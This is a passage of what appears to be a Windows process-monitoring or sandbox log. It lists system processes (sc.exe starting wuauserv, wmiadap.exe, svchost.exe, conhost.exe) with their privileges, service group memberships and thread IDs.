"S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 175 os_tid = 0xd28 Thread: id = 176 os_tid = 0x1154 Thread: id = 177 os_tid = 0xda4 Thread: id = 178 os_tid = 0x394 Thread: id = 179 os_tid = 0xb00 Thread: id = 180 os_tid = 0xc2c Thread: id = 181 os_tid = 0x1148 Thread: id = 182 os_tid = 0x84 Thread: id = 183 os_tid = 0x73c Thread: id = 184 os_tid = 0x7f0 Thread: id = 185 os_tid = 0xcd4 Thread: id = 186 os_tid = 0x4b0 Thread: id = 187 os_tid = 0xcd8 Thread: id = 188 os_tid = 0x520 Thread: id = 189 os_tid = 0xffc Thread: id = 190 os_tid = 0x1194 Thread: id = 191 os_tid = 0x1398 Thread: id = 192 os_tid = 0x1394 Thread: id = 193 os_tid = 0x1390 Thread: id = 194 os_tid = 0x1388 Thread: id = 195 os_tid = 0x1378 Thread: id = 196 os_tid = 0x1370 Thread: id = 197 os_tid = 0x134c Thread: id = 198 os_tid = 0x1348 Thread: id = 199 os_tid = 0x1344 Thread: id = 200 os_tid = 0x1290 Thread: id = 201 os_tid = 0x127c Thread: id = 202 os_tid = 0x128c Thread: id = 203 os_tid = 0x1288 Thread: id = 204 os_tid = 0x1238 Thread: id = 205 os_tid = 0x1228 Thread: id = 206 os_tid = 0x1224 Thread: id = 207 os_tid = 0x1218 Thread: id = 208 os_tid = 0x1214 Thread: id = 209 os_tid = 0x1210 Thread: id = 210 os_tid = 0xf58 Thread: id = 211 os_tid = 0xf30 Thread: id = 212 os_tid = 0xf2c Thread: id = 213 os_tid = 0xf28 Thread: id = 214 os_tid = 0xaa0 Thread: id = 215 os_tid = 0xa30 Thread: id = 216 os_tid = 0xa14 Thread: id = 217 os_tid = 0xa0c Thread: id = 218 os_tid = 0x9e8 Thread: id = 219 os_tid = 0x9e0 Thread: id = 220 os_tid = 0x9d8 Thread: id = 221 os_tid = 0x9cc Thread: id = 222 os_tid = 0x9c4 Thread: id = 223 os_tid = 0x9b8 Thread: id = 224 os_tid = 0x9b0 Thread: id = 225 os_tid = 0x9a0 Thread: id = 226 os_tid = 0x998 Thread: id = 227 os_tid = 0x984 Thread: id = 228 os_tid = 0x978 Thread: id = 229 os_tid = 0x968 Thread: id = 230 os_tid = 0x95c Thread: id = 231 os_tid = 0x958 Thread: id = 232 os_tid = 0x944 Thread: id = 233 os_tid = 0x930 Thread: id = 234 os_tid = 0x914 Thread: id = 235 os_tid = 0x8ac Thread: id = 236 os_tid = 0x840 Thread: id = 237 os_tid = 0x83c Thread: id = 238 os_tid = 0x430 Thread: id = 239 os_tid = 0x7c0 Thread: id = 240 os_tid = 0x7bc Thread: id = 241 os_tid = 0x7ac Thread: id = 242 os_tid = 0x784 Thread: id = 243 os_tid = 0x780 Thread: id = 244 os_tid = 0x77c Thread: id = 245 os_tid = 0x6fc Thread: id = 246 os_tid = 0x678 Thread: id = 247 os_tid = 0x670 Thread: id = 248 os_tid = 0x660 Thread: id = 249 os_tid = 0x654 Thread: id = 250 os_tid = 0x61c Thread: id = 251 os_tid = 0x5d0 Thread: id = 252 os_tid = 0x5a0 Thread: id = 253 os_tid = 0x4ac Thread: id = 254 os_tid = 0x41c Thread: id = 255 os_tid = 0x414 Thread: id = 256 os_tid = 0x404 Thread: id = 257 os_tid = 0x158 Thread: id = 258 os_tid = 0x39c Thread: id = 259 os_tid = 0x2e8 Thread: id = 260 os_tid = 0x180 Thread: id = 261 os_tid = 0x234 Thread: id = 262 os_tid = 0x26c Thread: id = 263 os_tid = 0x2a0 Thread: id = 264 os_tid = 0x170 Thread: id = 265 os_tid = 0x1a8 Thread: id = 266 os_tid = 0x16c Thread: id = 267 os_tid = 0x3b0 Thread: id = 268 os_tid = 0xd98 Thread: id = 269 os_tid = 0xce0 Thread: id = 270 os_tid = 0x524 Thread: id = 297 os_tid = 0xf74 Thread: id = 298 os_tid = 0x1038 Process: id = "30" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x35c02000" os_pid = "0x10a8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x3ac" cmd_line = "C:\\WINDOWS\\system32\\sc.exe start wuauserv" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 271 os_tid = 0xe84 Process: id = "31" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x36a7f000" os_pid = "0x10ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x3ac" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 272 os_tid = 0x824 Thread: id = 273 os_tid = 0x908 Thread: id = 274 os_tid = 0x728 Thread: id = 275 os_tid = 0x10b4 Thread: id = 276 os_tid = 0x5f0 Thread: id = 277 os_tid = 0x1088 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x738d0000" os_pid = "0x3d8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "29" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xa], "NT SERVICE\\TimeBroker" [0xa], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 278 os_tid = 0xa94 Thread: id = 279 os_tid = 0x564 Thread: id = 280 os_tid = 0xf94 Thread: id = 281 os_tid = 0xf9c Thread: id = 282 os_tid = 0xfa8 Thread: id = 283 os_tid = 0x102c Thread: id = 284 os_tid = 0xf50 Thread: id = 285 os_tid = 0xf34 Thread: id = 286 os_tid = 0x54c Thread: id = 287 os_tid = 0x444 Thread: id = 288 os_tid = 0x418 Thread: id = 289 os_tid = 0x410 Thread: id = 290 os_tid = 0x35c Thread: id = 291 os_tid = 0x3f4 Thread: id = 292 os_tid = 0x3f0 Thread: id = 293 os_tid = 0x33c Thread: id = 294 os_tid = 0x238 Thread: id = 295 os_tid = 0x154 Thread: id = 296 os_tid = 0x3dc Process: id = "33" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3447e000" os_pid = "0x103c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x10a8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 299 os_tid = 0x1040